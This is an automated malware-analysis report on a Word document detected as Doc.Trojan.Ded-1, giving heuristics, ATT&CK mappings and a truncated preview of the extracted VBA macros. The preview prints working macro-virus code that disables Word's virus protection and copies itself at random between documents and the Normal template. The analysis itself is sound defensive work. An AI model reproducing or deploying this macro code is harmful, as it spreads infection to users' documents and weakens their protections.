MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Word document containing VBA macros. The macros attempt to disable virus protection and inject code into the document, likely to establish persistence or download additional malware. The presence of `Shell()` calls and the ClamAV detection signature 'Doc.Trojan.Ded-1' strongly indicate malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ded-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21373 bytes |
SHA-256: 6345aea0e326ff847428dd8059c49b8017771134a47a8dd8b4c8e092a7e3a859 |
|||
|
Detection
ClamAV:
Doc.Trojan.Ded-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_New()
End Sub
'9.637774
Private _
Sub Document_Close()
On _
Error GoTo skam
Options. _
VirusProtection = False
SWL
'33.61163
ABS99
'42.56033
skam:
'8.957314
End Sub
'72.16117
Private Sub SWL()
'42.59714
Application. _
ShowVisualBasicEditor = False
If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
For _
I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
d = NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Lines(I, 1)
If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
While Mid(d, _
Len(d) - 1, 2) = " _"
I _
= I + 1
d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'95.43525
d = _
e(d)
ActiveDocument. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d
End If
'90.69127
Next I
'36.27004
ActiveDocument. _
SaveAs AddToRecentFiles:=False
End If
'87.02004
End Sub
'90.91909
Private Sub _
ABS99()
If Not NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
f (NormalTemplate. _
FullName)
For I = _
1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
d = ActiveDocument.VBProject. _
VBComponents(1).CodeModule.Lines(I, 1)
If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then
While _
Mid(d, Len(d) - 1, 2) = " _"
I = _
I + 1
d = Left(d, _
Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
Wend
'95.04152
d _
= e(d)
NormalTemplate.VBProject. _
VBComponents(1).CodeModule.InsertLines I * 2, d
End If
'29.928
Next I
'63.33987
NormalTemplate. _
Save
End If
'4.384488
End Sub
'4.367179
Private Function _
e(aString) As String
aString _
= LTrim(aString)
aString = RTrim(aString)
'62.57433
If aString = "Sub " & "Vc()" Then
'53.55306
aString _
= "Sub " & "ViewVBCode()"
Else
'98.58498
If aString = "Sub " & "ViewVBCode()" Then
'60.07596
aString _
= "Sub " & "Vc()"
End If
'61.56798
End _
If
For _
I = 1 To Len(aString) - 1
If _
Mid(aString, I, 1) = "." Then
If Not _
Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then
If Not Mid(aString, I + 1, 1) _
= Chr$(34) Then
e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & e
'57.74265
Next j
'78.44582
Exit _
Function
End If
'30.3376
End If
'26.83433
Else
'31.48093
If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then
If _
Not Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then
e = Left(aString, I - 1) & " _" & _
Chr$(13) & Right(aString, Len(aString) - I)
For _
j = 1 To Int(15 * Rnd)
e = " " & e
'10.19003
Next j
'56.59349
Exit _
Function
End _
If
End _
If
End _
If
Next I
'45.99786
e = _
aString & Chr$(13) & "'" & (100 * Rnd)
Count
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.